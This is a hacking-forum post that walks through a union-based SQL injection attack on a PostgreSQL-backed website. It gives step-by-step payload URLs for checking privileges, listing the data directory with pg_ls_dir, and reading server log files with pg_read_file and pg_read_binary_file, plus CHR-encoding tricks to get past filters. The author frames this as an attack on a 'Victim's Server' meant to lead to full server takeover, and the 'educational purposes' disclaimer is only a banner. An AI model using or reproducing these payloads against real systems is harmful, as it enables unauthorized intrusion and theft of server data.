Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Reading Log Files in Postgresql Sql Injection

  • 0 Vote(s) - 0 Average


07-19-2017, 08:02 AM #1
MadSec Offline BlackHat **
Registered
Posts:7 Threads:5 Joined:Mar 2017 Reputation: 0
Mood: Mad
99  Hey everyone,

So I guess it's time to learn something juicy about Postgresql.
If you're injecting a Website based on a Postgresql database then you might wanna check your privileges because this will simply allow you to use lots of interesting Postgresql Functions in case you could:
You can find most of these functions in here: http://www.postgresql.org/docs/9.4/s...ons-admin.html

What we will be covering in this Tutorial is related to reading Log Files. The Log Files contain everything related to the Postgresql Database running on our Victim's Server and we all know that Log Files holds really interesting information that may allow us to take over the whole server easily, so lets just get started.


Vulnerable Link:


Code:
http://127.0.0.1/search.php?name=username


Checking if we have Privileges:

There's two thing we have to do to see if we have privileges or not.
Firstly, we have to get the Current User and Secondly, we will check if this user has the right privileges.


Code:
http://127.0.0.1/search.php?name=username union select current_user

Output: postgres
TIP: In my case there's only one column in the default table.


Code:
http://127.0.0.1/search.php?name=username union select is_grantable from information_schema.role_table_grants where grantee='postgres'

Before we move on, this should be explained. In Postgresql there's multiply tables in information_schema that contains a lot of nice information about our privileges.
Those tables are:
role_table_grants: http://www.postgresql.org/docs/8.4/s...le-grants.html
role_column_grants: http://www.postgresql.org/docs/8.4/s...mn-grants.html
role_routine_grants: http://www.postgresql.org/docs/8.4/s...ne-grants.html
role_usage_grants: http://www.postgresql.org/docs/8.4/s...ge-grants.html

You can check and select what you want from these tables but in my case I am going to be using admin functions related to "pg_read_file" and many others so I'm gonna have to use role_table_grants because with it I can check if my user has privileges to using those functions.


Code:
http://127.0.0.1/search.php?name=username union select is_grantable from information_schema.role_table_grants where grantee='postgres'

Output: YES


Loading Directory Files:

Now that we know that we have privileges, we're going to check the names of the files in the Log Folder before we start reading them.
The functions that we are going to be using can be found here:
http://www.postgresql.org/docs/9.4/s...-GENFILE-TABLE

Those functions only allow us to do whatever we want with everything found in the "data" directory that can be found in the Postgresql Installation Directory:
[Image: data.png]

Now in our case we will only be reading files inside the "pg_log" directory. You can obviously check any other directory though.

Code:
http://127.0.0.1/search.php?name=username union select pg_ls_dir('pg_log')

Output:
[Image: logfiles.png]

If the above link didn't work then you can try the HEX or the CHAR value of "pg_log" instead of the plain one:

Code:
http://127.0.0.1/search.php?name=username union select pg_ls_dir( CHR(112) || CHR(103) || CHR(95) || CHR(108) || CHR(111) || CHR(103))

etc...


Reading Log Files:

There's many functions we can use to read a file:
pg_read_file()
pg_read_binary_file()
etc...

Using "pg_read_file":

Code:
http://127.0.0.1/search.php?name=username union select pg_read_file('pg_log\postgresql-2014-05-07_210124.log')

This will simply read the file and show its text on the page.

Using "pg_read_binary_file":

Code:
http://127.0.0.1/search.php?name=username union select cast(pg_read_binary_file('pg_log\postgresql-2014-05-07_210124.log') as varchar)

Before I explain this I would like to point that we used pg_read_binary_file which returns an unreadable value that, obviously, can't be shown on the webpage unless you use something similar to the "Cast" Function which will show the text of the file as you wish. (In my case as a "varchar"; showing a HEX value)
Now this is better than reading the file using pg_read_file because you can simply Decode the HEX value and get the exact layout of the Log file.

The usage of Cast isn't really necessary, you can use Convert etc...
TIP: Again, if things didn't work out you can simply use HEX or CHAR.

Output:

[Image: read.png]


I hope you found this useful, 

[Image: qXShBci.png]






Forum Jump:


Users browsing this thread:1 Guest(s)